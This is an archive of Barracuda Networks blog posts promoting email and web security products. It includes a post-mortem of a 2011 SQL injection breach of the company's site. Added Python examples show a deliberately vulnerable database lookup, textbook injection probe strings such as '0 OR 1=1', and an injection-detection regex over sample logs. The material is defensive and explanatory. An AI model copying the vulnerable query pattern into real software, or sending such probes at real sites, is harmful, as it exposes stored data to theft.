Barracuda Spam & Virus Firewall

At Barracuda Networks, 2012 is the Year of the School

Friday, February 10th, 2012

by Sanjay Ramnath, Product Manager

K-12 schools, districts, and agencies simply can’t afford not to make sure that their networks, data, and users are totally secure—especially with vulnerable students accessing those networks every day. The dangers are too great to take any chances. And with mobile devices and social-media usage extending the threat landscape in new directions, yesterday’s solutions simply aren’t good enough.

That’s why 2012 will see Barracuda Networks reaching out to K-12 organizations in North America—including public and private schools, school districts, and county and state education agencies—to let them know that effective, affordable, easy-to-manage security solutions are out there, optimized just for them.

To learn more about how Barracuda solutions address the unique network security challenges facing K-12 organizations, please download this informative white paper, entitled “Dynamic Content Security for K-12 Organizations.”

The Barracuda Advantage

“Dynamic Content Security” is the name for a more holistic, integrated approach to network security that delivers:

  • Improved network performance
  • Dramatic cost savings—both long- and short-term
  • Total content security that protects every user—including mobile and off-network users
  • Fine-grained controls to optimize capacity and access
  • Simple, centralized control panel to make network management a breeze (plus award-winning customer and technical support for when it’s not)
  • Comprehensive forensic reporting to optimize resources and budgets, identify bandwidth-hogging users and apps, demonstrate regulatory compliance, and manage civil or criminal liability
  • Multiple deployment options—including on-site appliances, virtual appliances, cloud-based services, or a combination—to ensure a solution that fits your needs, capabilities, and budget

Promotional Payment Terms for K-12 Customers

We understand the intense budget pressures affecting schools, districts, and agencies today. That’s why we created the K-12 Budget Alignment Program. This limited-time promotion allows qualified North American K-12 customers to postpone paying for their Barracuda security solutions until July 31, 2012—long enough to take advantage of new-fiscal-year budget allocations.

With the K-12 Budget Alignment Program 2012, security and compliance don’t have to wait; but paying for them can.

And there’s more: K-12 organizations may also qualify for a significant discount off the retail list price of selected Barracuda solutions. To learn more, contact Barracuda today at 1-888-ANTI-SPAM (1-888-268-4772).

Managing the Transformation in Education

K-12 education is changing, and technology is driving that change. The benefits of these changes are immense. But without a new approach to security, the threats they bring could easily overwhelm the advantages.

At Barracuda, we’re committed to helping K-12 organizations use Dynamic Content Security to manage that transformation safely, securely, simply, and affordably. With Barracuda solutions in place, schools can rest assured that their user community is protected; that network management will continue to be streamlined and simple; and that their IT costs will be kept as low as possible well into the future.


Why Outbound Filtering for Emails?

Thursday, December 15th, 2011

by Leena Merciline, product manager

This past week I encountered a customer issue, which occurs on a fairly regular basis.  The customer’s secure email gateway, a Barracuda Spam & Virus Firewall, was blocking emails from an external sender based on reputation analysis. As you can guess, the sender was not too happy about this. In this particular case, the sender’s IP address was blocked because spam was detected from it. This could be due to a number of reasons, which may include an internal compromised system generating spam or unintentional spamming by the sender.

This brings up the fact that, in today’s computing environment, IT departments can no longer assume that the internal networks are secure and free from malware. The use of outbound email filtering protects an organization on two fronts: it prevents the organization’s IP addresses from getting onto block lists, and it prevents sensitive data in emails from leaving the organization. A delay in detecting that your organization is on a block list can cause frustration and disrupt business, and removal from a block list takes time. Furthermore, for compliance with industry or government regulations, emails with customer confidential information need to be protected. This means blocking such emails or enforcing encryption.

I’d like to share a brief case study below of a customer who has already seen the benefits of using outbound email filtering on the Barracuda Spam & Virus Firewall.

Coming back to the customer issue, the sending organization could have avoided getting on the block list if it had deployed outbound email filtering.  For more information about outbound email filtering visit the Barracuda Spam & Virus Firewall product page, or contact one of our sales product specialists at +1 408 342 5400.


Barracuda Spam & Virus Firewall Firmware Release 5.1

Monday, October 24th, 2011

Posted by: Leena Merciline, Product Manager

With the availability of its latest firmware release 5.1, the Barracuda Spam & Virus Firewall continues to expand its feature set to offer customers more capabilities to secure their email infrastructure. Customers with current Energize Update Subscriptions can download this new firmware update. Major new features in this release are outlined below.

Internal Email Protection

With the Barracuda Microsoft Exchange Anti-Virus Agent, organizations can now protect their internal emails using the same virus definitions used by the Barracuda Spam & Virus Firewall. Viruses can easily be transmitted internally through the use of Outlook Web Access from home PCs, public kiosks and other machines not under the organization’s control. This can also apply to POP and IMAP if external access is allowed, and unauthorized machines are used to send email. Uploaded files can then be transmitted as email attachments to others within the organization. The agent, an add-in, runs as a Windows service on the Microsoft Exchange Server and enables the server to scan internal email for viruses. Via the agent, the Microsoft Exchange Server will receive constant virus definition updates.

Seamless Encryption with Microsoft Outlook

Senders now have the option to mark emails for encryption within Microsoft Outlook. The Barracuda Microsoft Outlook add-in includes an Encrypt Message button. While composing a message, the sender can mark the email for encryption using the Encrypt button and then send it. The encrypting process will be done by the Barracuda Spam & Virus Firewall and integrates with the existing outbound email encryption feature.

Email Encryption Branding

This release allows organizations to brand encryption notification emails as well as encrypted messages. The branding configuration is done on the Barracuda Spam & Virus Firewall on a per-domain level. Administrators can create custom subject and text or HTML message content in any language for the notification email. Encrypted messages on the Barracuda Message Center can be branded with a logo image and a domain name.

IPv6 Email Transport

New IPv6 support provides email receipt and delivery over IPv6 networks. The Barracuda Spam & Virus Firewall can receive email traffic from an IPv6 network, apply content policies, and deliver email traffic to either an IPv4 or IPv6 network. Email traffic can also be redirected by policy to an IPv6 server. Barracuda Reputation, DNS, and other Layer 3 checks will continue to be IPv4 only.

Outbound Sender Based Rate Control

To protect against compromised systems on internal networks sending high-volume spam, the Sender Based Rate Control feature for outbound emails is now based on the number of recipients. If the number of recipients from a sender exceeds the configured maximum in a 30-minute time window, the Barracuda Spam & Virus Firewall will defer further messages from the sender.
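As an added illustration (not Barracuda’s code), the following Python models the recipient-count rate control described above: accepted messages are counted per sender in a sliding 30-minute window, and a message that would push the sender past the configured maximum is deferred rather than relayed. The limit of 100 recipients, the sender addresses and the timings are constructed for the demonstration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Added example, not Barracuda's implementation: a per-sender sliding-window
# recipient counter modelling the 30-minute outbound Sender Based Rate Control.
# The limit, addresses and timings below are constructed for illustration.

WINDOW = timedelta(minutes=30)


class RecipientRateControl:
    def __init__(self, max_recipients, window=WINDOW):
        self.max_recipients = max_recipients
        self.window = window
        # sender -> deque of (timestamp, recipient_count) for accepted messages
        self._accepted = defaultdict(deque)

    def _prune(self, sender, now):
        # Drop accepted messages that have aged out of the window.
        queue = self._accepted[sender]
        while queue and now - queue[0][0] >= self.window:
            queue.popleft()

    def recipients_in_window(self, sender, now):
        self._prune(sender, now)
        return sum(count for _, count in self._accepted[sender])

    def check(self, sender, recipients, now):
        """Return 'accept' or 'defer' (a temporary failure back to the sending host)."""
        count = len(recipients)
        if self.recipients_in_window(sender, now) + count > self.max_recipients:
            return "defer"          # would exceed the maximum; deferred mail is not counted
        self._accepted[sender].append((now, count))
        return "accept"


def simulate(max_recipients=100):
    """Contrast a normal user with a compromised host blasting single-recipient spam."""
    rc = RecipientRateControl(max_recipients)
    t0 = datetime(2011, 10, 24, 9, 0, 0)
    outcomes = defaultdict(lambda: {"accept": 0, "defer": 0})

    # Normal user: 10 messages, 3 recipients each, spread over 30 minutes (30 in total).
    for i in range(10):
        rcpts = [f"user{i}{j}@example.net" for j in range(3)]
        when = t0 + timedelta(minutes=3 * i)
        outcomes["alice@example.com"][rc.check("alice@example.com", rcpts, when)] += 1

    # Compromised host: 150 messages, one recipient each, one every 10 seconds.
    for i in range(150):
        when = t0 + timedelta(seconds=10 * i)
        outcomes["bot@example.com"][rc.check("bot@example.com", [f"v{i}@example.org"], when)] += 1

    # 50 minutes later the burst has aged out of the window, so the sender is accepted again.
    late = t0 + timedelta(minutes=50)
    outcomes["bot@example.com"][rc.check("bot@example.com", ["late@example.org"], late)] += 1
    return dict(outcomes)


if __name__ == "__main__":
    for sender, counts in simulate().items():
        print(f"{sender}: {counts}")
```

With a limit of 100, the first 100 single-recipient messages from the compromised host are relayed and the remaining 50 in the burst are deferred, while the normal user is never affected.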

Enhanced Barracuda Control Center Integration

With this release, administrators can centrally manage more global policies of the Barracuda Spam & Virus Firewall using Barracuda Networks’ centralized management application, the Barracuda Control Center. Administrators can manage Basic features, Block/Accept policies, and most Advanced features. The Barracuda Control Center provides a single view for configuration and management of multiple Barracuda Spam & Virus Firewalls.

The Barracuda Spam & Virus Firewall 5.1 firmware release includes additional user interface and mail processing enhancements. Please take a look at the 5.1 release notes for the details. For more information, please visit the Barracuda Spam & Virus Firewall product page.


Combining on-premises and cloud-based solutions for the most effective email security

Thursday, July 28th, 2011

by Aseem Asthana and Leena Merciline

The Barracuda Spam & Virus Firewall offers customers the most effective email security through its innovative hybrid deployment. The on-premises appliance combined with its Cloud Protection Layer pre-filter provides unmatched detection and protection against email-borne threats.

When enabled, emails are first processed by the Cloud Protection Layer before being delivered to the on-premises Barracuda Spam & Virus Firewall, which applies further checks, enforces organizational policy, scans outbound email and provides email encryption.

The Cloud Protection Layer blocks spam, viruses, fraud and phishing emails before they enter the corporate network, allowing customers to benefit from rapid changes in cloud protection techniques and more up-to-date cloud intelligence. The Cloud Protection Layer uses technologies that have been time-tested with the Barracuda Spam & Virus Firewall along with advanced cloud-based technologies including:

  • Barracuda Anti-Fraud Intelligence Engine – detects and blocks fraudulent emails
  • Barracuda Anti-Virus Supercomputing Grid – detects and blocks polymorphic viruses, viruses that try to evade detection by changing their signature

The Barracuda Spam & Virus Firewall further processes emails that have been filtered by the Cloud Protection Layer to ensure the most effective email security.

Recipient verification checks protect against Directory Harvest Attacks. Since the Barracuda Spam & Virus Firewall is usually inside the network, there is no need to open any ports in the network firewall for communicating with the directory server. The Barracuda Spam & Virus Firewall also provides granular policy checks, and emails can be blocked, quarantined or tagged based on specific rules.

Outbound email is scanned before being sent out of the organization, helping to ensure compliance with corporate policies and also to prevent compromised computers from being used as bots.

The Barracuda Spam & Virus Firewall also provides email encryption. Emails that match policy are securely transferred to the Barracuda Message Center which encrypts the emails and sends an out-of-band notification to the sender.

The Cloud Protection Layer is available to all Barracuda Spam & Virus Firewall customers with a valid Energize Updates subscription, running firmware release 5.0.0.003. A Barracuda Customer Login account is needed for setup. Sign up for an account by visiting https://www.barracudanetworks.com/login. Administration of the Cloud Protection Layer is provided through Barracuda Control Center.

Visit the Barracuda Spam & Virus Firewall product page for more information on how the Cloud Protection Layer can help your organization.


Why are Web site Attacks on the Rise?

Friday, June 24th, 2011

Posted by:  Steve Pao, VP of product management and Oliver Wai, product marketing manager

Recent high-profile Web security breaches have caused organizations in both the private and public sectors to take a deeper look into the security measures they have in place as well as to question why there is such a recent concentration of attacks.  We believe there are a few trends underlying the recent increase of attacks:

  • The first is the prevalence of hacking tools and “how-to” guides that are now available online on how to launch attacks. Whereas attacks used to be perpetrated by sophisticated hackers, now almost anyone can launch attacks using these resources and automated tools.  Just Google “how to hack [system]” or “hacking tools” and you will find a plethora of tools and tips on how to accomplish these objectives.
  • The second trend is economics. Traditional money making scams and threats like spam are increasingly ineffective as tools to protect against these threats have increased in use among organizations.  On the other hand, there is a thriving black market for stolen credit cards, emails, identities, zombie computers, etc. so data breaches are extremely profitable for hackers, and as a result, they are turning more attention to profitable endeavors like hacking Web sites.
  • The final trend is an increase in Web attacks for strategic purposes. Many of the most recent attacks like the ones on defense contractors, RSA/EMC, and Gmail are extremely sophisticated and seem to have a strategic purpose or sponsorship to them.

Unfortunately, many of these attacks are happening because the right security measures are not in place at many organizations.  This is not because there are no effective solutions available, but because there is a general lack of awareness and education about how these solutions can protect against such attacks.  In many cases, a breach itself serves as the defining lesson for why Web application security tools, such as a WAF (Web Application Firewall), should be in place.  Beyond any single tool, layered security within an organization’s infrastructure is also very important.

Overall, organizations need to understand the importance of having the right technology at each layer to protect their resources, and the recent attacks can serve to reinforce this need:

  • Protect your email infrastructure with an email filtering solution or service
  • Secure your Web sites and Web applications with a WAF
  • Reinforce your network perimeter with a next generation firewall
  • Strengthen your network against malware, drive-by-downloads and other threats with a Web filtering device or service

Barracuda Networks offers solutions to help organizations reinforce their network infrastructures from these attacks.  For more information on our complete line of security offerings, please visit the Product section of our Web site.


Barracuda Spam & Virus Firewall: Email Encryption for Everyone

Tuesday, May 31st, 2011

Posted by:  Aseem Asthana, product manager

Email encryption is commonly used by organizations to exchange sensitive information without fear of it falling into the wrong hands. Encryption works by transforming a plaintext email with a “key” that is unique to the recipient, so that only the recipient can decrypt and read the email. For this scheme to work, the sender must have the recipient’s key and trust that it belongs to the right person. Ensuring that every sender has every potential recipient’s correct key is a significant problem and hampers widespread deployment and use of email encryption.

The Barracuda Spam & Virus Firewall solves this problem by providing cloud-based email encryption which stores keys in a central location, so senders and recipients don’t have to worry about non-essentials.

Outbound emails are encrypted based on policies that are set by the administrator. Emails that match policy are securely transmitted to the cloud-based Barracuda Message Center which encrypts the emails with the recipient’s correct keys.  The recipient is sent an out-of-band notification via email, which includes a link. Upon clicking the link, the recipient can read the email that is meant for them. Since encryption is done in the cloud, there is no need to exchange keys between the sender and recipient, solving the problem that has plagued successful adoption of email encryption.

The traditional per user pricing schemes for email encryption are another barrier to widespread deployment.  Organizations commonly respond by designating a user or a group that is authorized to send out sensitive information via encrypted emails. Everyone else is required to submit sensitive information to this designated user or group for review and ultimate delivery via encrypted email. This imposes an unnatural change in how email is sent and received and impacts the speed of business.

There are no per user licensing fees associated with any feature of the Barracuda Spam & Virus Firewall, including email encryption. Organizations can rest assured that outbound emails containing sensitive information will be sent securely without having to worry about licensing fees.

Email encryption is available to all customers with a valid Energize Updates subscription running firmware release 5.0.0.003 and above. Visit the Barracuda Spam & Virus Firewall product page for more information.


Anatomy of a SQL Injection Attack

Tuesday, April 26th, 2011

Posted by:  Oliver Wai, product marketing manager

As you probably heard from our previous blog posting, Barracuda Networks suffered a breach from a SQL Injection attack on the weekend of April 8.  While the overall impact of the breach turned out to be relatively minor (only contact records consisting of names and email addresses), such an event always involves a post-mortem.  As is often the case with events such as data breaches or data center outages, there is never one single error that leads to the outage or attack, but rather a series of interrelated errors that ultimately results in a failure or vulnerability that can be exploited. Taken individually, each event is usually accounted for by the organization and there are redundancies in place to handle any failure. However, when taken together, the unexpected – in this case an attack on our site – occurs. In analyzing the attack, we observed:

  • In the rush to continually add timely and fresh content to the corporate Web site, a few mistakes were made in the PHP code.
  • Code vulnerability scanning of the affected part of the Web site was scheduled but had not yet occurred.
  • The Web Application Firewall that was put in place to harden the Web site was put into Passive Mode by human error during a maintenance window.

So while there were redundancies in place to secure our Web site, an unfortunate confluence of events last weekend left a vulnerability in our Web site exposed; this resulted in the SQL injection attack by a group we believe to be originating in Malaysia.  The upside? Since the Barracuda Web Application Firewall was still inspecting traffic even in Passive Mode, it gave us a detailed audit trail of the SQL Injection probe and the subsequent attack. This gave us the necessary forensics to quickly analyze the breach, contain the damage and reach out to those affected.

Analyzing the Attack

From our Barracuda Web Application Firewall logs we determined that there were two clients used to probe and attack the barracudanetworks.com Web site:


Using the information reported by the Barracuda Web Application Firewall, we were able to quickly filter and find the corresponding entries on our Web server logs:

(NOTE: the Web server logs use Greenwich Mean Time (GMT) whereas the Web Application Firewall uses Pacific Daylight Time (PDT) zone)

Drilling down into details of each entry on the Barracuda Web Application Firewall logs gives us clues on the attackers and the tools used in the attack:

The first attack started at 5:07pm PDT on April 9 and had an IP address of 115.134.249.15 which resolved to somewhere near Kuala Lumpur, Malaysia. This confirms online reports of the hacks originating from Malaysia. We also noticed that the attackers launched the attacks using a modified version of a pentest tool designed by “white hats” to probe Web sites for SQL injection vulnerabilities. This also seems to corroborate reports that the hackers responsible for the attacks hung out on “white hat” online communities. Looking at our Web server logs, we also see the same entries, enabling us to trace down what was attempted and what succeeded on our backend systems.

(NOTE: the Web server logs use GMT whereas the Web Application Firewall uses PDT)

From the recorded logs, it was clear that the first attacker used the automated tool to recursively crawl through the barracudanetworks.com Web site and blindly injected a series of SQL commands against each input parameter to find potential vulnerabilities. The SQL Injection tool finds the first vulnerability at 5:16pm PDT but continues to probe the Web site. At 8:10pm PDT a second client using the IP address of 87.106.220.57 joined the attack. The second IP address resolved to a server in Germany but it is unclear at this time if the server was a relay point or if it was a second attacker. Nevertheless, activities from the second IP were recorded and logged by the Barracuda Web Application Firewall:

Below is the screenshot of the corresponding Web server log:


(NOTE: the Web server logs use GMT whereas the Web Application Firewall uses PDT)

From the logs captured in the Barracuda Web Application Firewall, it seems that the attacker used the second client to launch manual attacks against discovered vulnerabilities while the primary attack script continued to scan the Web site for vulnerabilities. Ultimately, the attackers focused their efforts on a single weak point in a peripheral Web page where the input parameters were not properly sanitized. Here is the pseudo-code of the underlying vulnerability:

<?= Foo_Function($_GET['parameter']) /* takes the raw user input straight from the query string */ ?>

By not sanitizing the input value, it gave the attackers the ability to inject SQL commands into the HTML input parameter to attack the underlying database.

All developers are taught never to trust user input and that all inputs must be sanitized before they are sent to underlying servers.  However, what you can see from this example is that it is often not obvious to the naked eye that there is anything wrong with the code. This is why, in addition to using defensive coding, Barracuda Networks also uses code scanners and our own Web Application Firewall to guard against possible vulnerabilities. Unfortunately, in a Web site of tens of thousands of lines of code, all it takes is a single mistake. We have since fixed the code to protect against future attacks by adding a single line of code to sanitize the inputs on the affected page:

<?php
// Validate the input first; fall back to 0 if it does not pass the check
$parameter = @is_sanitized($_GET['parameter']) ? $_GET['parameter'] : 0;
?>
<?= Foo_Function($parameter) ?>
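An added example (in Python with SQLite rather than the page’s PHP; not Barracuda’s code) contrasting the vulnerable pattern above with two defences: an allow-list check that mirrors the page’s fix (the value is used only if it looks like a numeric id, else 0), and a parameterised query, a technique the page does not mention, which keeps the value as data even when validation is forgotten. The table, its rows and the `0 OR 1=1` probe are constructed for the demonstration.

```python
import re
import sqlite3

# Added example, not the page's PHP: the same defect in Python/SQLite, the
# allow-list check that mirrors the page's fix, and a parameterised query.
# Table, rows and probe string are constructed for the demonstration.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?, ?)", [
        (1, "Alice Example", "alice@example.com"),
        (2, "Bob Example", "bob@example.com"),
        (3, "Carol Example", "carol@example.com"),
    ])
    return conn


def vulnerable_lookup(conn, parameter):
    # Equivalent of Foo_Function($_GET['parameter']): the raw query-string value
    # is spliced into the SQL text, so it can change the statement's meaning.
    sql = f"SELECT name, email FROM contacts WHERE id = {parameter}"
    return conn.execute(sql).fetchall()


def is_sanitized(value):
    # Allow-list validation: the page expects a numeric id, nothing else.
    return re.fullmatch(r"[0-9]{1,9}", value) is not None


def sanitize_parameter(value):
    # Mirrors the page's one-line fix: use the value only if it passes, else 0.
    return int(value) if is_sanitized(value) else 0


def hardened_lookup(conn, parameter):
    # Validation plus binding: the driver passes the value separately from the
    # SQL text, so it is compared as data and can never become SQL syntax.
    return conn.execute("SELECT name, email FROM contacts WHERE id = ?",
                        (sanitize_parameter(parameter),)).fetchall()


def bind_only_lookup(conn, parameter):
    # Binding alone, without validation, already neutralises the injection:
    # the whole string is compared against the integer id and matches nothing.
    return conn.execute("SELECT name, email FROM contacts WHERE id = ?",
                        (parameter,)).fetchall()


def run_demo():
    conn = make_db()
    probe = "0 OR 1=1"          # constructed textbook probe against the id parameter
    return {
        "vulnerable_normal": vulnerable_lookup(conn, "2"),
        "vulnerable_probe_rows": len(vulnerable_lookup(conn, probe)),   # whole table leaks
        "hardened_normal": hardened_lookup(conn, "2"),
        "hardened_probe": hardened_lookup(conn, probe),                  # falls back to id 0
        "bind_only_probe": bind_only_lookup(conn, probe),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```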

From Vulnerability to Breach

Once the attackers found the vulnerable page, they attempted to steal the database user accounts.  Over the next 10 hours, they tried a number of different attacks in an attempt to break into the underlying database but failed each time. At 3:06am PDT, the attackers changed strategy to focus on the underlying database schema. This proved to be a correct strategy and by 3:19am PDT the first set of database records containing contact email addresses was stolen.

Barracuda Networks discovered the breach at 10:30am PDT and the Barracuda Web Application Firewall was re-enabled to Active Mode at 10:39am PDT. Once in place, the Barracuda Web Application Firewall immediately blocked all subsequent attacks from the 115.134.249.15 IP address. The attacker continued to cycle through attacks against the remaining pages for the next few hours, even when the Barracuda Web Application Firewall blocked all of the attacks. This seems to confirm that an automated pentest tool was used to blindly inject SQL commands. In all, a total of 110,892 SQL injection commands from both attacking IP addresses were sent against 175 URLs at a rate of 42 per minute.

In tracing the Web Firewall and Access logs on the Barracuda Web Application Firewall, we determined that the attackers compromised a Marketing database and stole two sets of records containing a total of 21,861 names and emails. However, since there were a number of duplicates between the two sets, and since many of the entries were from users who are no longer with the original organizations, the number of affected users is substantially lower.
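The post-mortem above correlates WAF logs (PDT) with Web server logs (GMT) and reports probe counts, distinct URLs and a per-minute rate; the following added Python (not Barracuda’s code) does the same kind of analysis over constructed combined-format log lines with RFC 5737 documentation addresses. The injection indicators are a small detection heuristic, not an exhaustive grammar.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, urlsplit

# Added example, not Barracuda's code: normalise WAF (PDT) and Web-server (GMT)
# timestamps to UTC and summarise injection probes per client IP.
# Log lines and addresses (RFC 5737 ranges) are constructed for illustration.

ACCESS_LOG = """\
192.0.2.10 - - [10/Apr/2011:00:07:12 +0000] "GET /products/index.php?id=17 HTTP/1.1" 200 5120
192.0.2.10 - - [10/Apr/2011:00:07:14 +0000] "GET /products/index.php?id=17'%20OR%201=1-- HTTP/1.1" 200 5133
192.0.2.10 - - [10/Apr/2011:00:08:30 +0000] "GET /products/index.php?id=17%20UNION%20SELECT%201,2 HTTP/1.1" 500 311
192.0.2.10 - - [10/Apr/2011:00:09:01 +0000] "GET /news/item.php?n=4'%20OR%20'a'='a HTTP/1.1" 200 2201
192.0.2.10 - - [10/Apr/2011:00:10:14 +0000] "GET /news/item.php?n=4%3B%20SELECT%201 HTTP/1.1" 200 2201
198.51.100.7 - - [10/Apr/2011:03:10:05 +0000] "GET /news/item.php?n=4%20OR%201=1 HTTP/1.1" 200 2201
203.0.113.9 - - [10/Apr/2011:03:11:40 +0000] "GET /about.php HTTP/1.1" 200 1800
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# SQL syntax indicators in a decoded parameter value (a detection heuristic, not a grammar).
SQLI_RE = re.compile(r"(?i)(\bunion\b.*\bselect\b|\bor\b\s+\S+\s*=\s*\S+|--|;)")

PDT = timezone(timedelta(hours=-7))   # Pacific Daylight Time, as used by the WAF logs


def waf_time_to_utc(pdt_text):
    """Convert a WAF timestamp in PDT ('YYYY-MM-DD HH:MM:SS') to UTC for matching server logs."""
    return datetime.strptime(pdt_text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=PDT).astimezone(timezone.utc)


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")   # aware datetime (GMT)
    url = urlsplit(m["target"])
    params = parse_qsl(url.query, keep_blank_values=True)      # percent-decodes values
    return {"ip": m["ip"], "ts": ts, "path": url.path, "params": params, "status": int(m["status"])}


def is_injection_probe(entry):
    return any(SQLI_RE.search(value) for _, value in entry["params"])


def summarise(log_text):
    """Per client IP: probe count, distinct URLs hit, first/last UTC time, probes per minute."""
    stats = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry or not is_injection_probe(entry):
            continue
        s = stats.setdefault(entry["ip"], {"probes": 0, "urls": set(),
                                           "first": entry["ts"], "last": entry["ts"]})
        s["probes"] += 1
        s["urls"].add(entry["path"])
        s["first"] = min(s["first"], entry["ts"])
        s["last"] = max(s["last"], entry["ts"])
    for s in stats.values():
        minutes = max((s["last"] - s["first"]).total_seconds() / 60, 1.0)   # at least one minute
        s["per_minute"] = round(s["probes"] / minutes, 2)
        s["urls"] = sorted(s["urls"])
    return stats


if __name__ == "__main__":
    print("WAF 2011-04-09 17:07:14 PDT ->", waf_time_to_utc("2011-04-09 17:07:14"))
    for ip, s in summarise(ACCESS_LOG).items():
        print(ip, s["probes"], "probes against", s["urls"], "at", s["per_minute"], "/min")
```

A WAF entry at 5:07pm PDT on April 9 converts to 00:07 GMT on April 10, which is the offset to apply before searching the Web server log for the matching request.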

Any breach is a serious issue and we have reached out to the affected users documenting what has happened and any necessary precautions that they may need to take in response. We believe that the users affected by the breach are at minimal risk.  We do not store any sensitive information in our Marketing database other than names and email addresses. Moreover, since Barracuda Networks primarily uses this data to send emails on upcoming events, Webinars, or other corporate news, the risk of spear-phishing is low as all communications are one-directional and informational in nature. Finally since most users are existing Barracuda Spam & Virus Firewall customers, the vast majority of potential spam would likely be blocked regardless.

Conclusion

In hindsight, it was clear the Barracuda Web Application Firewall would have been able to detect and protect our Web site from the recent SQL Injection attack that occurred. However the reality of the situation is that with most breaches, the weak link is typically not with the technology itself but rather with the human element and the processes associated with security. Unfortunately attackers today have more sophisticated tools at their disposal to find victims. They can now automate the tedious task of finding vulnerabilities and focus solely on the “last mile” once a vulnerability is detected. What this means to the rest of us is that attacks will likely become more common and affect a much wider range of organizations.

The silver lining to this experience was that it helped us to demonstrate the effectiveness of the Barracuda Web Application Firewall in providing the necessary protection and auditing capabilities to defend against SQL injection attacks. The Barracuda Web Application Firewall was able to identify the SQL injection attack and would have blocked the attack if it had been placed in Active Mode. Nevertheless even in Passive Mode, the Barracuda Web Application Firewall was able to gather detailed forensic information that we used to investigate, contain and audit the affected systems. Using this data, we were able to quickly identify how the attacks occurred, what was breached and who we needed to reach out to after the incident.

While we have definitely advised customers on the risks of not securing their Web applications and we certainly have heard the worst-case scenarios from our customers as a vendor, we did not imagine that we would find ourselves having first-hand experience with such a scenario.  We learned some valuable lessons in this situation and we hope that our story serves as evidence of how important it is to harden and secure your Web applications.


Web Applications – The Weak Link of Security

Tuesday, September 7th, 2010

Posted by: Oliver Wai, product marketing manager

Today’s hackers are becoming increasingly sophisticated in planning and executing well designed multi-vector attacks. It used to be that attackers only employed a singular strategy to attack end users or computer systems. For example, virus attacks used to be spread by an email attachment. However with the mass adoption of email security products such as the Barracuda Spam & Virus Firewall and increased public awareness, these attacks are no longer effective since most attacks are quickly contained or blocked once detected.

A hacker is at once a rogue computer expert and a social psychologist who understands how people react. To have any efficacy, today’s hacker must use a number of mechanisms in tandem to trick users into sending personal data or downloading malicious software. A typical example of the elaborate web a hacker weaves: a well-disguised spam email takes a user to a legitimate Web site that has been compromised in advance with a Cross-Site Scripting (XSS) attack, which then uses social engineering techniques to steal personal or financial information.

Web Applications – The Weak Link

An old adage states that “you are only as strong as your weakest link.” Organizations have made investments in network firewalls and IDS/IPS systems to protect their networks. They have invested in security products to protect their email.  However, many organizations leave Web applications unprotected.  Considering that 75-90 percent of all attacks today are against Web applications, there is shockingly little security awareness and protection deployed to protect Web applications.

Because of all the dynamic feature functionality expected by users, Web applications use numerous programming languages & protocols to build efficient, multi-tier applications. A small application can easily have hundreds of thousands of lines of code, use more than 4 programming languages and be written by teams of engineers who might not have met in person before or may not work for the organization anymore. Given all the moving parts that are required to build an application, it is nearly impossible to build a perfectly secure application. A US Department of Defense study indicated that there are nearly 15 critical security defects in every thousand lines of code.  According to Forrester Research, even if a security defect is found, it still takes on average 30-90 days before it is fixed, tested, and applied to the application.  Hackers know about the difficulty of writing secure Web applications and they readily exploit vulnerabilities for large financial gains.

Your corporate Web sites, eCommerce portals, and other Web properties need protection. If you can access an application from a browser, then it is a Web application. Internal applications accessed by your employees such as Outlook Web Access, Oracle Financials, Microsoft SharePoint, SAP, Peoplesoft, or Issue Tracking Systems are all Web applications that need protection from attacks. What are you doing to protect them and how can you manage the security on the numerous applications required to keep your business running?

Barracuda Web Application Firewall – Protecting and Accelerating Web Applications

The Barracuda Web Application Firewall is an industry leading Web application security appliance used by some of the largest banks, car manufacturers, and government agencies around the world. It is also used by numerous mid-market organizations and small businesses to protect their valuable Web assets. With thousands of appliances in deployment, it protects a sizeable number of domains that millions of people visit each year.

The key to the Barracuda Web Application Firewall’s success is in its ease of use. While there may be other solutions in the market, none provides the power, flexibility, and simplicity of the Barracuda Web Application Firewall. Using the industry standard reverse proxy architecture, the Barracuda Web Application Firewall provides deep inspection capability that allows it to protect applications from inbound attacks as well as outbound leaks of sensitive data such as social security and credit card numbers. Most importantly, the Barracuda Web Application Firewall is easy to configure and deploy. Using the predefined security policies included in all Barracuda Web Application Firewalls, many organizations have been able to self-install and protect against 85 percent of all Web application attacks in less than a day, sometimes in just a few hours.

In addition to Web application security, the Barracuda Web Application Firewall revolutionizes Web application delivery by providing numerous application acceleration capabilities free of charge. SSL offloading, load balancing, content routing, caching, compression, access control, server health monitoring, and TCP pooling are standard functionality on all enterprise-level Web Application Firewalls. Our design philosophy at Barracuda Networks is to design a solution that not only protects our customers’ Web assets but also enhances the application experience of our customers’ customers.

For questions about the Barracuda Web Application Firewall, please visit http://www.barracuda.com/waf or call Barracuda Networks for a free 30-day evaluation at 1-888-ANTI-SPAM or +1 408-342-5400. For more information on our other security and productivity solutions, please visit http://www.barracuda.com/products


How to Prevent Clickjacking Attacks

Wednesday, June 16th, 2010

Posted by:  Oliver Wai, product marketing manager

This is part two of a two-part post on how Web site clickjacking attacks work, and how to prevent them.

Unlike other common Web vulnerabilities, clickjacking is not a consequence of a bug in a Web application. Instead, clickjacking exploits the way browsers use HTML/CSS/JavaScript to render pages: an attacker’s page can lay a transparent frame of another site over its own content, so a click the user believes is on the attacker’s page actually lands on the framed site. It affects all of the major browser platforms including Internet Explorer, Mozilla Firefox, Google Chrome, and Apple Safari.

Why does this Matter?

